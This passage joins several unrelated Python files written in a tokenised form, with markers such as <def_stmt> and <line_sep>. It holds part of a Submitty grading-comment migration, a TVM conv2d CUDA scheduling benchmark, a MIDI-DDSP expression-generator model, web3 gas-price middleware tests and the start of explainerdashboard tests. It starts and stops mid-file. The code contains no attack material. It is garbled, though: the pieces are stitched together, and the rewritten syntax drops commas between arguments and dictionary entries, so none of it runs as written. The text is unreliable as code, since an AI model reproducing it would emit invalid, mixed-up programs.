CONSTRAINT gradeable_data_overall_comment_user_unique UNIQUE (g_id, goc_user_id, goc_grader_id);")<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_team_unique")<line_sep>database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_team_unique UNIQUE (g_id, goc_team_id, goc_grader_id);")<line_sep>database.execute(""" CREATE SEQUENCE IF NOT EXISTS gradeable_data_overall_comment_goc_id_seq START WITH 1 INCREMENT BY 1 NO MINVALUE NO MAXVALUE CACHE 1; """)<line_sep>database.execute("ALTER SEQUENCE 
gradeable_data_overall_comment_goc_id_seq OWNED BY gradeable_data_overall_comment.goc_id;")<line_sep>database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ALTER COLUMN goc_id SET DEFAULT nextval('gradeable_data_overall_comment_goc_id_seq'::regclass);")<line_sep># All old overall comments belong to the instructor instructor_id=database.execute("SELECT user_id FROM users WHERE user_group = 1;").first()[0]<line_sep>rows=database.execute(""" SELECT g_id, gd_user_id, gd_team_id, gd_overall_comment FROM gradeable_data; """)<for_stmt>g_id,user_id,team_id,comment rows<block_start>query=''' INSERT INTO gradeable_data_overall_comment ( g_id, goc_user_id, goc_team_id, goc_grader_id, goc_overall_comment ) VALUES ( :g_id, :user_id, :team_id, :grader_id, :comment ) ON CONFLICT DO NOTHING; '''<line_sep>params={'g_id':g_id 'user_id':user_id 'team_id':team_id 'grader_id':instructor_id 'comment':comment}<line_sep>database.session.execute(query params)<block_end><block_end><def_stmt>down config database semester course<block_start>""" Run down migration (rollback). :param config: Object holding configuration details about Submitty :type config: migrator.config.Config :param database: Object for interacting with given database for environment :type database: migrator.db.Database :param semester: Semester of the course being migrated :type semester: str :param course: Code of course being migrated :type course: str """<line_sep><pass><block_end>
""" Test different schedule on conv2d_nchw Target NVIDIA GPU ==================================== **Author**: `<NAME>` """<import_stmt>tvm<import_stmt>json<import_from_stmt>flextensor.measure _evaluate<import_from_stmt>flextensor.nn conv2d_nchw<import_from_stmt>flextensor.configs.conv2d_config yolo_shapes_b8<import_from_stmt>flextensor.utils any_factor_split<class_stmt>Parameter(object)<block_start><def_stmt>__init__ self<block_start>self.b_factors=[2 4 1 1]<line_sep>self.k_factors=[8 4 8 2]<line_sep>self.p_factors=[7 1 2 1]<line_sep>self.q_factors=[1 1 14 1]<line_sep>self.rc_factors=[1 32 32]<line_sep>self.ry_factors=[1 1 1]<line_sep>self.rx_factors=[1 1 1]<block_end><def_stmt>__str__ self<block_start>ret=""<line_sep>ret<augadd>str(self.b_factors)+"\n"<line_sep>ret<augadd>str(self.k_factors)+"\n"<line_sep>ret<augadd>str(self.p_factors)+"\n"<line_sep>ret<augadd>str(self.q_factors)+"\n"<line_sep>ret<augadd>str(self.rc_factors)+"\n"<line_sep>ret<augadd>str(self.ry_factors)+"\n"<line_sep>ret<augadd>str(self.rx_factors)+"\n"<line_sep><return>ret<block_end><block_end><def_stmt>schedule_yolo_conv_cuda_1 s outputs inputs weight parameter# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># create cache write_cache=s.cache_write(outputs "local")<line_sep>read_share_weight=s.cache_read(weight "shared" [write_cache])<line_sep># read_local_weight = s.cache_read(read_share_weight, "local", [write_cache]) read_share_inputs=s.cache_read(padded "shared" [write_cache])<line_sep># read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache]) b_factors=parameter.b_factors<line_sep>k_factors=parameter.k_factors<line_sep>p_factors=parameter.p_factors<line_sep>q_factors=parameter.q_factors<line_sep>rc_factors=parameter.rc_factors<line_sep>ry_factors=parameter.ry_factors<line_sep>rx_factors=parameter.rx_factors<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep>by=tvm.te.thread_axis("blockIdx.y")<line_sep>bz=tvm.te.thread_axis("blockIdx.z")<line_sep>vx=tvm.te.thread_axis("vthread")<line_sep>vy=tvm.te.thread_axis("vthread")<line_sep>vz=tvm.te.thread_axis("vthread")<line_sep>tx=tvm.te.thread_axis("threadIdx.x")<line_sep>ty=tvm.te.thread_axis("threadIdx.y")<line_sep>tz=tvm.te.thread_axis("threadIdx.z")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>kernel_scope,b=s[outputs].split(b nparts=1)<line_sep>bo,bi=s[outputs].split(b nparts=b_factors[0])<line_sep>ko,ki=s[outputs].split(k nparts=k_factors[0])<line_sep>po,pi=s[outputs].split(p nparts=p_factors[0])<line_sep>qo,qi=s[outputs].split(q nparts=q_factors[0])<line_sep>vbo,bi=s[outputs].split(bi nparts=b_factors[1])<line_sep>vko,ki=s[outputs].split(ki nparts=k_factors[1])<line_sep>vpo,pi=s[outputs].split(pi nparts=p_factors[1])<line_sep>vqo,qi=s[outputs].split(qi nparts=q_factors[1])<line_sep>tbo,bi=s[outputs].split(bi nparts=b_factors[2])<line_sep>tko,ki=s[outputs].split(ki nparts=k_factors[2])<line_sep>tpo,pi=s[outputs].split(pi nparts=p_factors[2])<line_sep>tqo,qi=s[outputs].split(qi nparts=q_factors[2])<line_sep># reorder s[outputs].reorder(bo ko po qo vbo vko vpo vqo tbo tko tpo tqo bi ki pi qi)<line_sep># fuse bko=s[outputs].fuse(bo ko)<line_sep>vbko=s[outputs].fuse(vbo vko)<line_sep>tbko=s[outputs].fuse(tbo tko)<line_sep>bki=s[outputs].fuse(bi ki)<line_sep># bind s[outputs].bind(bko bz)<line_sep>s[outputs].bind(po by)<line_sep>s[outputs].bind(qo bx)<line_sep>s[outputs].bind(vbko vz)<line_sep>s[outputs].bind(vpo vy)<line_sep>s[outputs].bind(vqo 
vx)<line_sep>s[outputs].bind(tbko tz)<line_sep>s[outputs].bind(tpo ty)<line_sep>s[outputs].bind(tqo tx)<line_sep># compute at write cache s[write_cache].compute_at(s[outputs] tqo)<line_sep>rc,ry,rx=s[write_cache].op.reduce_axis<line_sep>rco,rci=s[write_cache].split(rc nparts=rc_factors[0])<line_sep>rcm,rci=s[write_cache].split(rci nparts=rc_factors[1])<line_sep>ryo,ryi=s[write_cache].split(ry nparts=ry_factors[0])<line_sep>rym,ryi=s[write_cache].split(ryi nparts=ry_factors[1])<line_sep>rxo,rxi=s[write_cache].split(rx nparts=rx_factors[0])<line_sep>rxm,rxi=s[write_cache].split(rxi nparts=rx_factors[1])<line_sep>a,b,c,d=s[write_cache].op.axis<line_sep>s[write_cache].reorder(rco ryo rxo rcm rym rxm rci ryi rxi a b c d)<line_sep># compute at read cache s[read_share_weight].compute_at(s[write_cache] rxm)<line_sep># s[read_local_weight].compute_at(s[write_cache], rxi) s[read_share_inputs].compute_at(s[write_cache] rxm)<line_sep># s[read_local_inputs].compute_at(s[write_cache], rxi) # cooperative fetching <for_stmt>cache [read_share_inputs read_share_weight]<block_start>cb,ck,ch,cw=s[cache].op.axis<line_sep>fused=s[cache].fuse(cb ck ch cw)<line_sep>fused,bindx=s[cache].split(fused factor=q_factors[2])<line_sep>fused,bindy=s[cache].split(fused factor=p_factors[2])<line_sep>fused,bindz=s[cache].split(fused factor=b_factors[2]<times>k_factors[2])<line_sep>s[cache].bind(bindx tx)<line_sep>s[cache].bind(bindy ty)<line_sep>s[cache].bind(bindz tz)<block_end>s[outputs].pragma(kernel_scope 'auto_unroll_max_step' 1500)<line_sep>s[outputs].pragma(kernel_scope 'unroll_explicit' 1)<line_sep>s[padded].compute_inline()<block_end><def_stmt>schedule_yolo_conv_cuda_2 s outputs inputs weight parameter# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># create cache write_cache=s.cache_write(outputs "local")<line_sep>read_share_weight=s.cache_read(weight "shared" [write_cache])<line_sep># read_local_weight = s.cache_read(read_share_weight, "local", [write_cache]) read_share_inputs=s.cache_read(padded "shared" [write_cache])<line_sep># read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache]) b_factors=parameter.b_factors<line_sep>k_factors=parameter.k_factors<line_sep>p_factors=parameter.p_factors<line_sep>q_factors=parameter.q_factors<line_sep>rc_factors=parameter.rc_factors<line_sep>ry_factors=parameter.ry_factors<line_sep>rx_factors=parameter.rx_factors<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep>by=tvm.te.thread_axis("blockIdx.y")<line_sep>bz=tvm.te.thread_axis("blockIdx.z")<line_sep>vx=tvm.te.thread_axis("vthread")<line_sep>vy=tvm.te.thread_axis("vthread")<line_sep>vz=tvm.te.thread_axis("vthread")<line_sep>tx=tvm.te.thread_axis("threadIdx.x")<line_sep>ty=tvm.te.thread_axis("threadIdx.y")<line_sep>tz=tvm.te.thread_axis("threadIdx.z")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>kernel_scope,b=s[outputs].split(b nparts=1)<line_sep>ko,ki=s[outputs].split(k nparts=k_factors[0])<line_sep>po,pi=s[outputs].split(p nparts=p_factors[0])<line_sep>qo,qi=s[outputs].split(q nparts=q_factors[0])<line_sep>vko,ki=s[outputs].split(ki nparts=k_factors[1])<line_sep>vpo,pi=s[outputs].split(pi nparts=p_factors[1])<line_sep>vqo,qi=s[outputs].split(qi nparts=q_factors[1])<line_sep>tko,ki=s[outputs].split(ki nparts=k_factors[2])<line_sep>tpo,pi=s[outputs].split(pi nparts=p_factors[2])<line_sep>tqo,qi=s[outputs].split(qi nparts=q_factors[2])<line_sep># reorder s[outputs].reorder(ko po qo vko vpo vqo tko tpo tqo ki pi 
qi)<line_sep># s[outputs].reorder(po, bko, qo, vqo, vbko, vpo, tbko, tpo, tqo, bki, pi, qi) # fuse bko=s[outputs].fuse(b ko)<line_sep># bind s[outputs].bind(bko bz)<line_sep>s[outputs].bind(po by)<line_sep>s[outputs].bind(qo bx)<line_sep>s[outputs].bind(vko vz)<line_sep>s[outputs].bind(vpo vy)<line_sep>s[outputs].bind(vqo vx)<line_sep>s[outputs].bind(tko tz)<line_sep>s[outputs].bind(tpo ty)<line_sep>s[outputs].bind(tqo tx)<line_sep># compute at write cache s[write_cache].compute_at(s[outputs] tqo)<line_sep>rc,ry,rx=s[write_cache].op.reduce_axis<line_sep>rco,rci=s[write_cache].split(rc nparts=rc_factors[0])<line_sep>rcm,rci=s[write_cache].split(rci nparts=rc_factors[1])<line_sep>ryo,ryi=s[write_cache].split(ry nparts=ry_factors[0])<line_sep>rym,ryi=s[write_cache].split(ryi nparts=ry_factors[1])<line_sep>rxo,rxi=s[write_cache].split(rx nparts=rx_factors[0])<line_sep>rxm,rxi=s[write_cache].split(rxi nparts=rx_factors[1])<line_sep>a,b,c,d=s[write_cache].op.axis<line_sep>s[write_cache].reorder(rco ryo rxo rcm rym rxm rci ryi rxi a b c d)<line_sep># compute at read cache s[read_share_weight].compute_at(s[write_cache] rxm)<line_sep># s[read_local_weight].compute_at(s[write_cache], rxi) s[read_share_inputs].compute_at(s[write_cache] rxm)<line_sep># s[read_local_inputs].compute_at(s[write_cache], rxi) # cooperative fetching <for_stmt>cache [read_share_inputs read_share_weight]<block_start>cb,ck,ch,cw=s[cache].op.axis<line_sep>fused=s[cache].fuse(cb ck ch cw)<line_sep>fused,bindx=s[cache].split(fused factor=q_factors[2])<line_sep>fused,bindy=s[cache].split(fused factor=p_factors[2])<line_sep>fused,bindz=s[cache].split(fused factor=k_factors[2])<line_sep>s[cache].bind(bindx tx)<line_sep>s[cache].bind(bindy ty)<line_sep>s[cache].bind(bindz tz)<block_end>s[outputs].pragma(kernel_scope 'auto_unroll_max_step' 1500)<line_sep>s[outputs].pragma(kernel_scope 'unroll_explicit' 1)<line_sep>s[padded].compute_inline()<block_end><def_stmt>schedule_yolo_conv_cuda_3 s outputs inputs weight parameter# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># create cache write_cache=s.cache_write(outputs "local")<line_sep>read_share_weight=s.cache_read(weight "shared" [write_cache])<line_sep># read_local_weight = s.cache_read(read_share_weight, "local", [write_cache]) read_share_inputs=s.cache_read(padded "shared" [write_cache])<line_sep># read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache]) b_factors=parameter.b_factors<line_sep>k_factors=parameter.k_factors<line_sep>p_factors=parameter.p_factors<line_sep>q_factors=parameter.q_factors<line_sep>rc_factors=parameter.rc_factors<line_sep>ry_factors=parameter.ry_factors<line_sep>rx_factors=parameter.rx_factors<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep>by=tvm.te.thread_axis("blockIdx.y")<line_sep>bz=tvm.te.thread_axis("blockIdx.z")<line_sep>vx=tvm.te.thread_axis("vthread")<line_sep>vy=tvm.te.thread_axis("vthread")<line_sep>vz=tvm.te.thread_axis("vthread")<line_sep>tx=tvm.te.thread_axis("threadIdx.x")<line_sep>ty=tvm.te.thread_axis("threadIdx.y")<line_sep>tz=tvm.te.thread_axis("threadIdx.z")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>kernel_scope,b=s[outputs].split(b nparts=1)<line_sep>bo,bi=s[outputs].split(b nparts=b_factors[0])<line_sep>ko,ki=s[outputs].split(k nparts=k_factors[0])<line_sep>po,pi=s[outputs].split(p nparts=p_factors[0])<line_sep>qo,qi=s[outputs].split(q nparts=q_factors[0])<line_sep>vbo,bi=s[outputs].split(bi 
nparts=b_factors[1])<line_sep>vko,ki=s[outputs].split(ki nparts=k_factors[1])<line_sep>vpo,pi=s[outputs].split(pi nparts=p_factors[1])<line_sep>vqo,qi=s[outputs].split(qi nparts=q_factors[1])<line_sep>tbo,bi=s[outputs].split(bi nparts=b_factors[2])<line_sep>tko,ki=s[outputs].split(ki nparts=k_factors[2])<line_sep>tpo,pi=s[outputs].split(pi nparts=p_factors[2])<line_sep>tqo,qi=s[outputs].split(qi nparts=q_factors[2])<line_sep># reorder s[outputs].reorder(bo ko po qo vbo vko vpo vqo tbo tko tpo tqo bi ki pi qi)<line_sep># fuse outer=s[outputs].fuse(bo ko po qo)<line_sep>middle=s[outputs].fuse(vbo vko vpo vqo)<line_sep>inner=s[outputs].fuse(tbo tko tpo tqo)<line_sep># bind s[outputs].bind(outer bx)<line_sep>s[outputs].bind(inner tx)<line_sep># compute at write cache s[write_cache].compute_at(s[outputs] inner)<line_sep>rc,ry,rx=s[write_cache].op.reduce_axis<line_sep>rco,rci=s[write_cache].split(rc nparts=rc_factors[0])<line_sep>rcm,rci=s[write_cache].split(rci nparts=rc_factors[1])<line_sep>ryo,ryi=s[write_cache].split(ry nparts=ry_factors[0])<line_sep>rym,ryi=s[write_cache].split(ryi nparts=ry_factors[1])<line_sep>rxo,rxi=s[write_cache].split(rx nparts=rx_factors[0])<line_sep>rxm,rxi=s[write_cache].split(rxi nparts=rx_factors[1])<line_sep>a,b,c,d=s[write_cache].op.axis<line_sep>s[write_cache].reorder(rco ryo rxo rcm rym rxm rci ryi rxi a b c d)<line_sep># compute at read cache s[read_share_weight].compute_at(s[write_cache] rxm)<line_sep># s[read_local_weight].compute_at(s[write_cache], rxi) s[read_share_inputs].compute_at(s[write_cache] rxm)<line_sep># s[read_local_inputs].compute_at(s[write_cache], rxi) # cooperative fetching <for_stmt>cache [read_share_inputs read_share_weight]<block_start>cb,ck,ch,cw=s[cache].op.axis<line_sep>fused=s[cache].fuse(cb ck ch cw)<line_sep>fused,bindx=s[cache].split(fused factor=b_factors[2]<times>k_factors[2]<times>p_factors[2]<times>q_factors[2])<line_sep>s[cache].bind(bindx tx)<block_end>s[outputs].pragma(kernel_scope 'auto_unroll_max_step' 1500)<line_sep>s[outputs].pragma(kernel_scope 'unroll_explicit' 1)<line_sep>s[padded].compute_inline()<block_end><def_stmt>schedule_yolo_conv_opencl s outputs inputs weight# inline the padding operation <block_start>padded=outputs.op.input_tensors[0]<line_sep># prepare thread_axis bx=tvm.te.thread_axis("blockIdx.x")<line_sep># split the spatial axes b,k,p,q=s[outputs].op.axis<line_sep>bo,bi=s[outputs].split(b nparts=1)<line_sep>s[outputs].bind(bo bx)<line_sep>s[padded].compute_inline()<block_end><def_stmt>try_yolo_conv config parameter fsch# get the compute # (1, 3, 448, 448, 64, 3, 7, 7, 1, 2, 3, 1, 1) <block_start>batch,CI,H,W,CO,_,kh,kw,_,st,pad,dilation,group=config<line_sep>inputs=tvm.te.placeholder((batch CI H W) dtype="float32")<line_sep>weight=tvm.te.placeholder((CO CI kh kw) dtype="float32")<line_sep>outputs=conv2d_nchw(inputs weight stride=st padding=pad dilation=dilation groups=group)<line_sep>s=tvm.te.create_schedule(outputs.op)<line_sep>fsch(s outputs inputs weight parameter)<line_sep>arg_bufs=[inputs weight outputs]<line_sep>stmt=tvm.lower(s arg_bufs simple_mode=<true>)<line_sep># print(stmt) dev_id=2<line_sep>ctx=tvm.nd.context("cuda" dev_id)<line_sep>max_dims=ctx.max_thread_dimensions<line_sep>kwargs={"max_shared_memory_per_block":ctx.max_shared_memory_per_block "max_threads_per_block":ctx.max_threads_per_block "max_thread_x":max_dims[0] "max_thread_y":max_dims[1] "max_thread_z":max_dims[2]}<line_sep>verify=tvm.tir.ir_pass.VerifyGPUCode(stmt kwargs)<line_sep># print("config is:\n %s" % (str(config))) 
<if_stmt>verify<block_start>print("Valid kernel")<line_sep>time_cost=_evaluate(s arg_bufs "cuda" dev_id 10)<line_sep>print("Yolo conv use" time_cost "ms\n")<block_end><else_stmt><block_start>print("Invalid kernel")<line_sep>time_cost=float("inf")<block_end><return>time_cost<block_end><if_stmt>__name__<eq>"__main__"<block_start>res=[]<line_sep>parameters=[]<with_stmt>open("yolo_conv_b8_parameters.txt" "r")<as>fin<block_start><for_stmt>line fin<block_start>_,content=line.split(":" 1)<line_sep>obj=json.loads(content)<line_sep>op_parameters=obj[0]<line_sep>conv_parameters=op_parameters[1]<line_sep>parameter=Parameter()<line_sep>parameter.b_factors=conv_parameters["spatial"][0]<line_sep>parameter.k_factors=conv_parameters["spatial"][1]<line_sep>parameter.p_factors=conv_parameters["spatial"][2]<line_sep>parameter.q_factors=conv_parameters["spatial"][3]<line_sep>parameter.rc_factors=conv_parameters["reduce"][0]<line_sep>parameter.ry_factors=conv_parameters["reduce"][1]<line_sep>parameter.rx_factors=conv_parameters["reduce"][2]<line_sep>parameters.append(parameter)<block_end><block_end><for_stmt>config,parameter list(zip(yolo_shapes_b8 parameters))[:]<block_start>cost=try_yolo_conv(config parameter schedule_yolo_conv_cuda_3)<line_sep>res.append(cost)<block_end><for_stmt>ele res<block_start>print(ele)<block_end><block_end>
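# --- Illustrative sketch (not part of the original script) ---
# The schedules above split every spatial axis with three nested `nparts` splits
# (block / vthread / thread). The helper below shows, in plain Python, how a
# hypothetical factor list such as [4, 2, 8] decomposes an axis extent and what
# is left for one thread to compute serially. The numbers are made up.
def split_extent(extent, nparts_list):
    """Apply successive nparts splits, mimicking s.split(axis, nparts=...)."""
    parts = []
    for nparts in nparts_list:
        parts.append(nparts)
        extent = (extent + nparts - 1) // nparts  # ceil-divide, like TVM's split
    return parts, extent

parts, per_thread = split_extent(64, [4, 2, 8])
print(parts, per_thread)  # [4, 2, 8] 1 -> blockIdx / vthread / threadIdx tiles, 1 element per thread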
# Copyright 2022 The MIDI-DDSP Authors. # # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Expression generator module class."""<import_from_stmt>abc ABC<import_stmt>tensorflow<as>tf<import_from_stmt>ddsp.training nn<import_from_stmt>midi_ddsp.data_handling.instrument_name_utils NUM_INST<import_from_stmt>midi_ddsp.modules.cond_rnn TwoLayerCondAutoregRNN<line_sep>tfk=tf.keras<line_sep>tfkl=tfk.layers<class_stmt>LangModelOutputLayer(tfkl.Layer)<block_start><def_stmt>__init__ self n_out nhid=256<block_start>super().__init__()<line_sep>self.n_out=n_out<line_sep>self.dense_out=nn.FcStackOut(ch=nhid layers=2 n_out=self.n_out)<block_end><def_stmt>call self inputs<block_start>outputs=self.dense_out(inputs)<line_sep>outputs={'raw_output':outputs}<line_sep><return>outputs<block_end><block_end><class_stmt>ExpressionGenerator(TwoLayerCondAutoregRNN tf.keras.Model ABC)<block_start>"""Expression Generator that takes note sequence as input and predicts note expression controls."""<line_sep># TODO:(yusongwu) merge teacher_force and autoregressive function, # things need to change: # def sample_out(self, out, cond, time, training=False): # curr_out = self.sample_out(curr_out, cond, i, training=training) # output = self.split_teacher_force_output(output, cond) <def_stmt>__init__ self n_out=6 nhid=128 norm=<true> dropout=0.5<block_start>super().__init__(nhid=nhid n_out=n_out input_dropout=<true> input_dropout_p=0.5 dropout=dropout )<line_sep>self.birnn=tfkl.Bidirectional(tfkl.GRU(units=nhid return_sequences=<true> dropout=dropout) )<line_sep>self.dense_out=LangModelOutputLayer(nhid=nhid n_out=self.n_out)<line_sep>self.norm=nn.Normalize('layer')<if>norm<else><none><line_sep>self.pitch_emb=tfkl.Embedding(128 64)<line_sep>self.duration_emb=tfkl.Dense(64)<line_sep>self.instrument_emb=tfkl.Embedding(NUM_INST 64)<block_end><def_stmt>autoregressive self cond training=<false><block_start>note_pitch=cond['note_pitch'][<ellipsis> tf.newaxis]<line_sep>cond=self.encode_cond(cond training=training)<line_sep>batch_size=cond.shape[0]<line_sep>length=cond.shape[1]<line_sep>prev_out=tf.tile([[0.0]] [batch_size self.n_out])[: tf.newaxis :]<line_sep># go_frame prev_states=(<none> <none>)<line_sep>overall_outputs=[]<for_stmt>i range(length)<block_start>curr_cond=cond[: i :][: tf.newaxis :]<line_sep>prev_out=self.encode_out(prev_out)<line_sep>curr_out,curr_states=self._one_step(curr_cond prev_out prev_states training=training)<line_sep>curr_out=self.sample_out(curr_out note_pitch[: i :][: tf.newaxis :])<line_sep>overall_outputs.append(curr_out)<line_sep>prev_out,prev_states=curr_out['output'] curr_states<block_end>outputs={}<for_stmt>k curr_out.keys()<block_start>outputs[k]=tf.concat([x[k]<for>x overall_outputs] 1)<block_end><return>outputs<block_end><def_stmt>teacher_force self cond out training=<true><block_start>note_pitch=cond['note_pitch'][<ellipsis> tf.newaxis]<line_sep>out_shifted=self.right_shift_encode_out(out)<line_sep>cond=self.encode_cond(cond training=training)<line_sep>z_in=tf.concat([cond out_shifted] 
-1)<line_sep>z_out,*states=self.rnn1(z_in training=training)<line_sep>z_out,*states=self.rnn2(z_out training=training)<line_sep>output=self.decode_out(z_out)<line_sep>output=self.sample_out(output note_pitch)<line_sep><return>output<block_end><def_stmt>encode_cond self cond training=<false><block_start>z_pitch=self.pitch_emb(cond['note_pitch'])<line_sep>z_duration=self.duration_emb(cond['note_length'])<line_sep>z_instrument=self.instrument_emb(tf.tile(cond['instrument_id'][: tf.newaxis] [1 z_pitch.shape[1]]))<line_sep>cond=tf.concat([z_pitch z_duration z_instrument] -1)<line_sep>cond=self.birnn(cond training=training)<line_sep><return>cond<block_end><def_stmt>decode_out self z_out<block_start><if_stmt>self.norm<is><not><none><block_start>z_out=self.norm(z_out)<block_end>output=self.dense_out(z_out)<line_sep><return>output<block_end><def_stmt>sample_out self out note_pitch<block_start>output=out.copy()<line_sep>sampled_output=out['raw_output']<line_sep>rest_note_mask=tf.cast(note_pitch<ne>0 tf.float32)<line_sep>sampled_output<augmul>rest_note_mask<line_sep>output['output']=sampled_output<line_sep><return>output<block_end><def_stmt>call self cond out=<none> training=<false><block_start><if_stmt>training<block_start>outputs=self.teacher_force(cond out training=training)<block_end><else_stmt><block_start>outputs=self.autoregressive(cond training=training)<block_end><return>outputs<block_end><block_end><def_stmt>get_fake_data_expression_generator target_dim<block_start>instrument_id=tf.ones([1] dtype=tf.int64)<line_sep>cond={'note_pitch':tf.ones([1 32] dtype=tf.int64) 'note_length':tf.ones([1 32 1] dtype=tf.float32) 'instrument_id':instrument_id}<line_sep>target=tf.ones([1 32 target_dim] dtype=tf.float32)<line_sep>fake_data={'cond':cond 'target':target}<line_sep><return>fake_data<block_end>
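# --- Usage sketch (illustrative, not part of the original module) ---
# Build the expression generator and exercise both code paths with the fake-data
# helper defined above: teacher forcing for training and autoregressive sampling
# for inference. Shapes follow get_fake_data_expression_generator.
model = ExpressionGenerator(n_out=6, nhid=128)
fake_data = get_fake_data_expression_generator(target_dim=6)

# Teacher forcing consumes the ground-truth targets (training=True).
train_out = model(fake_data['cond'], out=fake_data['target'], training=True)

# Autoregressive sampling feeds each prediction back in (training=False).
sample_out = model(fake_data['cond'], training=False)

print(train_out['output'].shape, sample_out['output'].shape)  # (1, 32, 6) each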
<import_stmt>pytest<import_from_stmt>unittest.mock Mock <import_from_stmt>web3.middleware gas_price_strategy_middleware <line_sep>@pytest.fixture<def_stmt>the_gas_price_strategy_middleware web3<block_start>make_request,web3=Mock() Mock()<line_sep>initialized=gas_price_strategy_middleware(make_request web3)<line_sep>initialized.web3=web3<line_sep>initialized.make_request=make_request<line_sep><return>initialized<block_end><def_stmt>test_gas_price_generated the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value=5<line_sep>method='eth_sendTransaction'<line_sep>params=({'to':'0x0' 'value':1 } )<line_sep>the_gas_price_strategy_middleware(method params)<line_sep>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.assert_called_once_with({'to':'0x0' 'value':1 })<line_sep>the_gas_price_strategy_middleware.make_request.assert_called_once_with(method ({'to':'0x0' 'value':1 'gasPrice':'0x5' } ))<block_end><def_stmt>test_gas_price_not_overridden the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value=5<line_sep>method='eth_sendTransaction'<line_sep>params=({'to':'0x0' 'value':1 'gasPrice':10 } )<line_sep>the_gas_price_strategy_middleware(method params)<line_sep>the_gas_price_strategy_middleware.make_request.assert_called_once_with(method ({'to':'0x0' 'value':1 'gasPrice':10 } ))<block_end><def_stmt>test_gas_price_not_set_without_gas_price_strategy the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value=<none><line_sep>method='eth_sendTransaction'<line_sep>params=({'to':'0x0' 'value':1 } )<line_sep>the_gas_price_strategy_middleware(method params)<line_sep>the_gas_price_strategy_middleware.make_request.assert_called_once_with(method params)<block_end><def_stmt>test_not_generate_gas_price_when_not_send_transaction_rpc the_gas_price_strategy_middleware<block_start>the_gas_price_strategy_middleware.web3.getGasPriceStrategy=Mock()<line_sep>the_gas_price_strategy_middleware('eth_getBalance' [])<line_sep>the_gas_price_strategy_middleware.web3.getGasPriceStrategy.assert_not_called()<block_end>
<import_stmt>unittest<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<import_stmt>shap<import_stmt>plotly.graph_objects<as>go<import_from_stmt>sklearn.linear_model LinearRegression LogisticRegression<import_from_stmt>explainerdashboard.explainers RegressionExplainer ClassifierExplainer<import_from_stmt>explainerdashboard.datasets titanic_fare titanic_survive titanic_names<class_stmt>LinearRegressionTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_fare()<line_sep>self.test_len=len(X_test)<line_sep>train_names,test_names=titanic_names()<line_sep>_,self.names=titanic_names()<line_sep>model=LinearRegression()<line_sep>model.fit(X_train y_train)<line_sep>self.explainer=RegressionExplainer(model X_test y_test shap='linear' cats=[{'Gender':['Sex_female' 'Sex_male' 'Sex_nan']} 'Deck' 'Embarked'] idxs=test_names units="$")<block_end><def_stmt>test_explainer_len self<block_start>self.assertEqual(len(self.explainer) self.test_len)<block_end><def_stmt>test_int_idx self<block_start>self.assertEqual(self.explainer.get_idx(self.names[0]) 0)<block_end><def_stmt>test_random_index self<block_start>self.assertIsInstance(self.explainer.random_index() int)<line_sep>self.assertIsInstance(self.explainer.random_index(return_str=<true>) str)<block_end><def_stmt>test_preds self<block_start>self.assertIsInstance(self.explainer.preds np.ndarray)<block_end><def_stmt>test_pred_percentiles self<block_start>self.assertIsInstance(self.explainer.pred_percentiles() np.ndarray)<block_end><def_stmt>test_permutation_importances self<block_start>self.assertIsInstance(self.explainer.get_permutation_importances_df() pd.DataFrame)<block_end><def_stmt>test_metrics self<block_start>self.assertIsInstance(self.explainer.metrics() dict)<line_sep>self.assertIsInstance(self.explainer.metrics_descriptions() dict)<block_end><def_stmt>test_mean_abs_shap_df self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_top_interactions self<block_start>self.assertIsInstance(self.explainer.top_shap_interactions("Age") list)<line_sep>self.assertIsInstance(self.explainer.top_shap_interactions("Age" topx=4) list)<block_end><def_stmt>test_contrib_df self<block_start>self.assertIsInstance(self.explainer.get_contrib_df(0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_contrib_df(0 topx=3) pd.DataFrame)<block_end><def_stmt>test_shap_base_value self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<block_end><def_stmt>test_shap_values_shape self<block_start>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><def_stmt>test_mean_abs_shap self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_calculate_properties self<block_start>self.explainer.calculate_properties(include_interactions=<false>)<block_end><def_stmt>test_pdp_df self<block_start>self.assertIsInstance(self.explainer.pdp_df("Age") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Gender") 